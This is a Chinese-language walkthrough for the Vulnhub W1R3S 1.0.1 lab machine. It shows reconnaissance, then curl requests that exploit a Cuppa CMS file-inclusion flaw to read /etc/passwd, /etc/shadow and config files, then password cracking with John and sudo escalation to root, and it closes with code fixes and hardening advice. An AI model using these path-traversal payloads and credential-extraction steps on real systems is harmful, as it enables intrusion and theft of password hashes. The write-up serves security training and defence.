当前位置: 首页 > news >正文

Cuppa CMS 文件包含漏洞实战:W1R3S 1.0.1靶机从LFI到Root的3步提权

Cuppa CMS文件包含漏洞深度剖析:从LFI到Root的实战路径

1. 靶机环境与漏洞背景

W1R3S 1.0.1是一个专为渗透测试练习设计的Vulnhub靶机,其核心漏洞存在于Cuppa CMS的alertConfigField.php文件中。这个基于PHP的内容管理系统由于未对urlConfig参数进行严格过滤,导致攻击者可以通过路径遍历实现本地文件包含(LFI)。

典型漏洞特征

  • 影响版本:Cuppa CMS全版本
  • 漏洞类型:本地文件包含(LFI)
  • 危险等级:高危
  • 利用条件:需访问/administrator目录
  • 攻击复杂度:低

在实际测试环境中,我们常遇到以下配置特征:

# 典型漏洞文件路径 /administrator/alerts/alertConfigField.php # 常见敏感文件路径 /etc/passwd /etc/shadow /var/www/html/config.php

2. 信息收集与漏洞识别

2.1 基础扫描技术

完整的渗透测试始于系统化的信息收集。对于W1R3S靶机,推荐采用分层扫描策略:

  1. 主机发现

    nmap -sn 192.168.1.0/24
  2. 端口扫描

    nmap -T4 -A -p- 靶机IP
  3. 服务识别

    nmap -sV -sC -O 靶机IP

常见扫描结果分析

端口服务潜在风险
21FTP匿名登录可能
22SSH暴力破解风险
80HTTPWeb应用漏洞
3306MySQL弱口令/未授权访问

2.2 Web目录枚举

使用dirsearch进行深度目录扫描:

python3 dirsearch.py -u http://靶机IP -e php,html,js -t 50

关键发现

  • /administrator:Cuppa CMS后台
  • /wordpress:伪装的干扰目录
  • /javascript:可能包含敏感配置

3. 漏洞利用实战

3.1 LFI漏洞验证

通过curl发送POST请求验证漏洞:

curl -X POST -d "urlConfig=../../../../../../../../../etc/passwd" http://靶机IP/administrator/alerts/alertConfigField.php

响应分析技巧

  • 查看HTTP状态码(200表示成功)
  • 检查返回内容长度
  • 注意特殊字符转义情况

3.2 敏感文件提取

关键文件获取方法

  1. 用户列表:

    curl -s --data-urlencode "urlConfig=../../../../../../../../../etc/passwd" http://靶机IP/administrator/alerts/alertConfigField.php | grep -E '/bin/bash|/bin/sh'
  2. 密码哈希:

    curl -s --data-urlencode "urlConfig=../../../../../../../../../etc/shadow" http://靶机IP/administrator/alerts/alertConfigField.php > shadow.txt
  3. Web配置:

    curl --data-urlencode "urlConfig=../../../../../../../../../var/www/html/config.php" http://靶机IP/administrator/alerts/alertConfigField.php

4. 密码破解与权限提升

4.1 John破解实战

  1. 提取有效哈希:

    grep -E 'root|w1r3s' shadow.txt > crack.hash
  2. 使用John破解:

    john --wordlist=/usr/share/wordlists/rockyou.txt crack.hash
  3. 查看破解结果:

    john --show crack.hash

典型结果

w1r3s:computer:18090:0:99999:7:::

4.2 SSH登录与提权

  1. 建立SSH连接:

    ssh w1r3s@靶机IP
  2. 权限检查:

    sudo -l
  3. 提权操作:

    sudo su -

提权后操作

# 查找flag文件 find / -name flag* 2>/dev/null # 查看系统信息 cat /etc/issue; uname -a # 检查计划任务 crontab -l

5. 防御与加固建议

5.1 临时修复方案

  1. 文件权限控制:

    chmod 750 /administrator/alerts/ chmod 640 /administrator/alerts/alertConfigField.php
  2. Web服务器配置:

    location ~ /alerts/ { deny all; }

5.2 代码层修复

  1. 参数过滤:

    $allowed_paths = ['config/','alerts/']; if(!in_array($_POST['urlConfig'], $allowed_paths)) { die('Invalid path'); }
  2. 目录限制:

    $base_dir = '/var/www/html/'; $real_path = realpath($base_dir . $_POST['urlConfig']); if(strpos($real_path, $base_dir) !== 0) { die('Path traversal attempt detected'); }

5.3 长期安全措施

安全加固清单

  • [ ] 定期更新CMS核心
  • [ ] 实施WAF规则
  • [ ] 启用PHP安全模式
  • [ ] 配置严格的文件权限
  • [ ] 部署入侵检测系统

6. 攻击链可视化

完整的攻击路径可概括为:

  1. 信息收集 → 2. 服务枚举 → 3. 漏洞识别 → 4. LFI利用 → 5. 凭证获取 → 6. 权限提升

时间效率对比

阶段新手耗时熟练者耗时
信息收集30min10min
漏洞识别60min15min
密码破解120min5min
权限提升60min2min

在实际渗透测试项目中,这种类型的漏洞通常能在2小时内完成从发现到利用的全过程。关键在于建立系统化的测试流程和丰富的经验积累。

http://www.jsqmd.com/news/1149894/

相关文章:

  • HackMe-1 靶机实战:SQL注入到文件上传的 3 步完整攻击链复现
  • 高效太阳能电池缺陷检测基准:2624张EL图像深度学习实战指南
  • 010Editor 网络验证绕过实战:3 种补丁方法与 1 个关键跳转定位
  • Burp Suite 2024.6 实战:3类业务逻辑漏洞靶场复现与自动化脚本编写
  • iwebsec靶场 XXE漏洞实战:3种协议读取文件与内网探测(附完整Payload)
  • B/S架构电子病历编辑器(EMRE)部署实战:SpringBoot 2.7 + MySQL 8.0 环境搭建5步
  • A3910与MKV58F1M0VLQ24在工业电机控制中的经典组合
  • 微信小程序内容安全审核 2.0:imgSecCheck 与 mediaCheckAsync 双接口选型指南
  • 语音克隆实战终极指南:10分钟数据训练高质量变声模型
  • 基于51/STM32单片机矿井安全 瓦斯检测 天然气 甲烷报警物联网31(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • 5个步骤轻松解锁加密音乐文件:Unlock Music完全使用指南
  • 云注入去除方案对比:算法助手 vs MT解密工具 vs 手动Smali修改
  • 从零开始:STM32温度控制系统的实战指南
  • iwebsec靶场 XXE漏洞实战:3种协议读取/etc/passwd与源码(附PHP/Java/Python防御代码)
  • DVWA DOM XSS 4级漏洞实战:从Low到Impossible的3种绕过与1个防御核心
  • BQ25887充电芯片与TM4C129ENCPDT的电池平衡系统设计
  • 基于Arduino单片机温湿度报警 大棚温湿度采集系统 DHT1131(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_
  • Spring Boot + Vue 前后端分离订餐系统:5个常见安全漏洞与JWT认证方案
  • Citrix DDC 与 vCenter 证书信任:2种证书获取方法对比与“受信任的人”存储安装要点
  • Java RMI反序列化漏洞实战:ysoserial工具链利用与3种防护策略
  • 【Springboot毕设全套源码+文档】基于SpringBoot的吉他谱分享平台的设计与实现(丰富项目+远程调试+讲解+定制)
  • Unlock Music终极指南:3步解锁加密音乐,重获数字音乐所有权
  • XSS-Platform 源码部署实战:PHP 7.4 + Apache 环境 5 步配置避坑指南
  • PIC18F47Q10与PAM8904构建高效嵌入式警报系统
  • App安全测试自动化:3款开源工具对比与CI/CD集成实战
  • OWASP ZAP 2.15 与 Burp Suite 2024 对比评测:5 大核心功能与实战效率分析
  • 探索式测试(ET)与脚本测试(ST)实战对比:3个真实场景下的效率与缺陷发现率分析
  • Burp Suite CO2 1.2.0 插件实战:5步集成SQLMap自动化SQL注入检测
  • CVE-2023-33246 Apache RocketMQ 5.1.0 漏洞深度剖析:从配置更新到命令注入的3层调用链
  • EyouCMS 1.5.5 与 1.4.3 版本对比:2类后台RCE漏洞的利用路径演变